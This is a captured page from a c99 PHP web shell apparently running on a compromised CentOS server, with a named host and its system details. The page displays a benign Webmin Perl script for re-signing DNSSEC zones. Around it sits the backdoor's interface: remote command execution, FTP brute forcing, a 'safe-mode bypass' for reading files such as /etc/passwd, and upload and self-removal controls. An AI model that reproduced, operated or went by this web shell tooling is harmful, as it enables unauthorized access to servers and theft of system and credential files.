!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     resign.pl (1.91 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Called from cron to re-sign all zones that are too old

$no_acl_check++;
require './bind8-lib.pl';

my $zonefile;
my $krfile;
my $dom;
my $err;

if ($ARGV[0] eq "--debug") {
    $debug = 1;
    }
my $period = $config{'dnssec_period'} || 21;

@zones = &list_zone_names();
$errcount = 0;
$donecount = 0;
foreach $z (@zones) {
    # Get the key
    next if ($z->{'type'} ne 'master');
    $zonefile = &get_zone_file($z);
    $krfile = "$zonefile".".krf";    
    $dom = $z->{'members'} ? $z->{'values'}->[0] : $z->{'name'};

    print STDERR "Considering zone $z->{'name'}\n" if ($debug);

    # Do DNSSEC-Tools resign operation if zone is being managed by
    # DNSSEC-Tools
    if (&have_dnssec_tools_support() &&
        &check_if_dnssec_tools_managed($dom)) {
        &lock_file(&make_chroot($zonefile));
        $err = &dt_resign_zone($dom, $zonefile, $krfile, $period);
        &unlock_file(&make_chroot($zonefile));

        if ($err) {
            print STDERR "  Re-signing of $z->{'name'} failed : $err\n";
            $errcount++;
        }
        elsif ($debug) {
            print STDERR "  Re-signed $z->{'name'} OK\n";
        }
        next;
    }
        
    @keys = &get_dnssec_key($z);
    print STDERR "  Key count ",scalar(@keys),"\n" if ($debug);
    next if (@keys != 2);
    ($zonekey) = grep { !$_->{'ksk'} } @keys;
    next if (!$zonekey);
    print STDERR "  Zone key in ",$zonekey->{'privatefile'},"\n"
        if ($debug);

    # Check if old enough
    @st = stat($zonekey->{'privatefile'});
    if (!@st) {
        print STDERR "  Private key file $zonekey->{'privatefile'} ",
                 "missing\n" if ($debug);
        next;
        }
    $old = (time() - $st[9]) / (24*60*60);
    print STDERR "  Age in days $old\n" if ($debug);
    if ($old > $config{'dnssec_period'}) {
        # Too old .. signing
        $err = &resign_dnssec_key($z);
        if ($err) {
            print STDERR "  Re-signing of $z->{'name'} failed : $err\n";
            $errcount++;
            }
        elsif ($debug) {
            print STDERR "  Re-signed $z->{'name'} OK\n";
            }
        $donecount++ if (!$err);
        }
    }
if ($donecount) {
    &restart_bind();
    }
exit($errcount);

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0121 ]--